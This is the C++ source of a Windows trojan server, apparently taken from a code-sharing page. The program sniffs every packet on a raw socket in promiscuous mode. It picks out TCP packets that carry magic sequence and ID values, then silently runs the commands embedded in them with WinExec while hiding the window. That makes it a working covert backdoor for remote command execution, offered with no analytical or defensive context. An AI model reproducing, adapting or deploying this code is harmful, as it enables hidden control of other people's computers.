📄 trojanserver.cpp
字号:
#include "mysock.h"
#define MAX_PACKET_SIZE 65536
#define SEQ_IDENTITY 12345
#define TROJAN_ID_IDENTITY 6789
//trojan packet header
typedef struct trojanhdr
{
unsigned long trojan_id;
unsigned short trojan_len;
}TROJANHEADER, *PTROJANHEADER;
//get local ip
unsigned long GetLocalIP()
{
char szLocalIP[20] = {0};
char szHostName[128+1] = "\0";
hostent *phe;
int i;
if( gethostname(szHostName, 128 ) == 0 ) {
// Get host adresses
phe = gethostbyname(szHostName);
for( i = 0; phe != NULL && phe->h_addr_list[i]!= NULL; i++ )
{
sprintf(szLocalIP, "%d.%d.%d.%d",
(UINT)((UCHAR*)phe->h_addr_list[i])[0],
(UINT)((UCHAR*)phe->h_addr_list[i])[1],
(UINT)((UCHAR*)phe->h_addr_list[i])[2],
(UINT)((UCHAR*)phe->h_addr_list[i])[3]);
}
}
else
return 0;
return inet_addr(szLocalIP);
}
int DecodeData(char* pBuffer)
{
PIPHEADER pIPHeader = (PIPHEADER)pBuffer;
PTCPHEADER pTCPHeader = (PTCPHEADER)(pBuffer + sizeof(IPHEADER));
PTROJANHEADER pTrojanHeader = (PTROJANHEADER)(pBuffer + sizeof(IPHEADER) + sizeof(TCPHEADER));
//check tcp packet
if (pIPHeader->proto != IPPROTO_TCP)
return -1;
//check seq
if (ntohs((unsigned short)(pTCPHeader->seq)) != SEQ_IDENTITY)
return -1;
//check ident
if (ntohs((unsigned short)(pTrojanHeader->trojan_id)) != TROJAN_ID_IDENTITY)
return -1;
//command length
unsigned short cmdlen = pTrojanHeader->trojan_len;
if (0 == cmdlen)
return -1;
//printf("OK!\n"); //it is the packet we want!
char * pCommand = new char[cmdlen + 1];
memset(pCommand, 0, cmdlen + 1);
memcpy(pCommand, pBuffer + sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER), cmdlen);
//execute command
int nRet = WinExec(pCommand, SW_HIDE);
if (nRet > 31)
{
//WinExec Successfully!
//return the message we want...
}
return 0;
}
int SniffThread()
{
int nRet;
SOCKADDR_IN addr_in;
SOCKET rawSocket;
DWORD dwBufferLen[10];
DWORD dwBufferInLen = 1;
DWORD dwBytesReturned = 0;
//create a raw socket
rawSocket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (INVALID_SOCKET == rawSocket)
{
printf("socket error : %d\n",WSAGetLastError());
closesocket(rawSocket);
return -1;
}
addr_in.sin_family = AF_INET;
addr_in.sin_port = INADDR_ANY;
addr_in.sin_addr.S_un.S_addr = GetLocalIP();
nRet = bind(rawSocket, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (SOCKET_ERROR == nRet)
{
printf("bind error : %d\n", WSAGetLastError());
closesocket(rawSocket);
return -1;
}
//socket for sniffer
nRet = WSAIoctl(rawSocket,
SIO_RCVALL,
&dwBufferInLen,
sizeof(dwBufferInLen),
&dwBufferLen,
sizeof(dwBufferLen),
&dwBytesReturned,
NULL,
NULL);
if (SOCKET_ERROR == nRet)
{
printf("wsaioctl error : %d\n", WSAGetLastError());
closesocket(rawSocket);
return -1;
}
//start sniffing
char* pBuffer = new char[MAX_PACKET_SIZE];
while(1)
{
memset(pBuffer, 0, MAX_PACKET_SIZE);
nRet = recv(rawSocket, pBuffer, MAX_PACKET_SIZE, 0);
if (SOCKET_ERROR == nRet)
{
printf("recv error : %d\n", WSAGetLastError());
free(pBuffer);
closesocket(rawSocket);
return -1;
}
if (nRet < 46)
continue;
//decode the data
DecodeData(pBuffer);
}
free(pBuffer);
closesocket(rawSocket);
return 0;
}
int main(int argc, char* argv[])
{
WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0 )
{
printf("WSAStartup Error:%d\n", WSAGetLastError());
return -1;
}
//start sniffer
SniffThread();
//clean up
WSACleanup();
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -